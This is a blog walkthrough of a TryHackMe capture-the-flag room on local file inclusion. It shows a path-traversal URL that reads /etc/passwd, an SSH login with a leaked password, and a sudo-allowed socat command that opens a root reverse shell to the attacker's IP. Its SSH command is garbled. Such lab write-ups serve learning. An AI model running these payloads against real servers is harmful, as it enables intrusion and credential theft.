Inclusion Writeup

A beginner-friendly writeup on TryHackMe’s Inclusion challenge.

Sajeth Jonathan
May 10 · 5 min read

Introduction

This challenge on focuses on Local File Inclusion attack. Local File Inclusion is when the attacker tricks the web application into exposing or running files on the webserver.

Resources used

  • Nmap
  • GTFObins
  • Kali VM

Enumeration

The first and foremost step in any attack is an enumeration. So, gather data about the services running using a Nmap scan.

From the scan results, we can derive that 2 services are running:

  • SSH
  • HTTP

Web Recon

Let’s poke at the Webserver and see it’s contents.

It seems to be a blog. Explore it and see if anything is interesting to focus on.

Local File Inclusion

The pages take in a parameter to the server to display the webpage. Tampering this may disclose files in the webserver causing an LFI attack if the application does not whitelist which files can be included.

Common files to look for :

  • /etc/passwd — View usernames of all users on a system
  • /etc/shadow — View hashed passwords of all users on the system
  • /etc/hosts — View other devices the webserver is communicating with.

and so much more if you’re clever.

You can combine this with Directory traversal to access the file you want.

>> website.com/article?name=../../../etc/passwd

The passwd file has been exposed. In this, we can observe the users present in the system.

There is a user named falconfeast. The interesting part is that there is a comment which possibly seems like a username and password. Keep in mind, this is a very rare occasion of having the password in the comment, which I believe is deliberately has been done by the creator of the room. After all this room is to understand the basics of LFI.

Entering the Web Server

Let’s assess the situation.

  • There are a username and password available
  • There is an SSH present in the webserver

So, the next step is to try logging in to the server using SSH.

>> ssh falconfeast@rootpassword

After logging in the directory has a user.txt file that contains the user flag!

Observing the placement of the user.txt, it would be safe to assume the root flag would be in /root folder.

Unfortunately, neither the privilege cannot be escalated nor the /root folder can be accessed directly. But, have a look at the command allowed for falconfeast using :

>> sudo -l

It mentions that the user is allowed to run /usr/bin/socat as root with no password required.

Socat is a command-line based utility that establishes two bidirectional byte streams and transfers data between them.

To learn how this can be abused, check .

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

From that, it is confirmed that a is possible.

Abusing Socat

On your machine run:

>> socat file:`tty`,raw,echo=0 tcp-listen:12345

And on the LFI machine, run :

>> RHOST= <your ip address> 
>> RPORT=12345
>> socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane

Once you run the command on the LFI machine, the reverse shell must have been successfully created and you can access the machine as root.

To confirm it, run:

>> id  #this would print the real and effective user and group IDs.

Then move into /root folder and list out the items in it.

The root.txt is present here with the root flag! (Now you can pat yourself :p )


The Unintentional Way

There is another easy way to read the user and root flag, but I don’t think it was the intended way but I would still love to share it.

The flags can be accessed directly through the URL if you are familiar with the location of the flags.

User Flag

Root Flag

Final Thoughts

This room is not only a good experience for anyone looking to learn about LFI but also introduces the concept of privilege escalation using Unix Binaries and reverse shells.

I will be trying other rooms at TryHackMe and posting my writeups too. So watch out this space for more awesome content.


InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Sajeth Jonathan

Written by

Cyber Security Enthusiast. I like to share what I learn and be a valuable member in the community.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Sajeth Jonathan

Written by

Cyber Security Enthusiast. I like to share what I learn and be a valuable member in the community.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app